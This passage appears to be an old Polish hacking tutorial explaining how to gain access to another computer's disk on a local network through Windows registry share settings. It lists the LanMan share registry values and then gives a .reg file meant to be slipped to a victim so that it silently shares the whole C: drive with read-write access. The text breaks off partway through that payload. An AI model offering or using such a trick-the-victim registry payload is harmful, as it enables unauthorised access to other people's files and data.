Jak dostać się do dysku innego komputera w sieci wykorzystując dziury w systemie ?

Metoda ta jest już trochę przestarzała i łatwa do wykrycia (aczkolwiek ciągle skuteczna), dlatego zdecydowałem się ją opisać.
Chyba każdy z nas miał już kiedyś do czynienia z rejestrem systemowym. Poprzez wpisywanie odpowiednich kluczy i wartości można całkowicie zrekonfigurować Windowsa i znacznie ograniczyć dostęp do zasobów komputera. W kluczu:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\
[nazwa udostępnionego foldera lub drukarki]

zapisana jest konfiguracja wszystkich udostępnionych zasobów na naszym komputerze (folderów i drukarek). W kluczu tym znajdują się następujące zmienne :

• Flags
• 101, 191 - folder udostępniony tylko do odczytu
• 102, 192 - folder udostępniony do odczytu i zapisu
• 103, 193 - folder udostępniony w zależności od podanego hasła
• Parm1enc, Parm2enc - zakodowane hasła (maks. 8 liter)
• Path - ścieżka dostępu do folderu
• Remark - opis
• Type -
• 0 dla folderów
• 1 dla drukarek.               

Manipulując tymi wartościami łatwo zmieniać konfiguracje udostępnień na swoim komputerze, ale jak wykorzystując rejestr systemowy aby zmienić i/lub odczytać konfiguracje innego komputera w sieci. Bardzo prymitywnym sposobem jest podsunięcie komuś w sieci zwykłego pliku rejestru. Np. takiego :

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Network\LanMan\C$]

"Flags"=dword:00000192

"Type"=dword:00000000

"Path"="C:\\"

"Parm2enc"=hex: